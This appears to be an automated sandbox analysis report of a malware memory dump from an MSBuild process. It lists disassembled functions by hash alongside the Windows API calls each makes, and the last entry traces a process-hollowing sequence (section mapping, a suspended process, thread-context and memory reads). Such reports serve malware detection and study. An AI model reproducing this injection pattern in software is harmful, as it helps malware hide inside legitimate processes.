                                                                                                • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                                                                                                • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                                                                                • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                                                                                                APIs
                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3997070919-0
                                                                                                • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                                                                                                • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                                                                                • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                                                                                                • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                • String ID:
                                                                                                • API String ID: 1663032902-0
                                                                                                • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                                • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                • Opcode Fuzzy Hash: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                                • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 2692324296-0
                                                                                                • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                APIs
                                                                                                  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                • String ID:
                                                                                                • API String ID: 1272433827-0
                                                                                                • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 1084509184-0
                                                                                                • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: BG3i@
                                                                                                • API String ID: 0-2407888476
                                                                                                • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                                                                • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                                • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                                                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                                                                • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >G
                                                                                                • API String ID: 0-1296849874
                                                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                                                                • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: eb6dcd73bfffb07de0d33a6a12f14aa0d82b51f90d467ca14a8fa5a669e44218
                                                                                                • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                                                                • Opcode Fuzzy Hash: eb6dcd73bfffb07de0d33a6a12f14aa0d82b51f90d467ca14a8fa5a669e44218
                                                                                                • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                                                                • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                                                                • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf641ef7c9a5d5f4565f47108fcd6adb42aefad3228fb1ad0f8822469bddd740
                                                                                                • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                                                                • Opcode Fuzzy Hash: bf641ef7c9a5d5f4565f47108fcd6adb42aefad3228fb1ad0f8822469bddd740
                                                                                                • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                                                                • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction ID: c2ccfb52f11e3b3b259396a7657262a28929e77abe156aeb413db61674ad6f9a
                                                                                                • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                • Instruction Fuzzy Hash: EB91C8722080A319DB2D463E847403FFFE19A563A1B1BA79FD4F2CB2C5EE18D564D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction ID: 4bc7a19b78b3923bd294324807b23a5e70e392b11aa895e474023c0768c286cc
                                                                                                • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                • Instruction Fuzzy Hash: 1C91B6762080A35ADB2D463AC43403FFFE15A563A1B1B979FD4F2CB2C5EE18C568D624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction ID: 8cd81e8b6c8cb135a2d00aee0b4681899237c427d703fcd1ed6b13232f465ad6
                                                                                                • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                • Instruction Fuzzy Hash: 439195722090A35ADB2D463D843403FFFE15E5A3A1B1B979FD4F2CB2C5EE28C5649624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                                                                • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction ID: b40c52ae0115b4061fe2d1036eda9829452ee7622c5651f608d151b30f65a328
                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                • Instruction Fuzzy Hash: B081C4722090A319DB2D463E843403FFFE15A563A5B1BA7AFD4F2CB2C5EE18C5649624
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                                                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                                                                • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
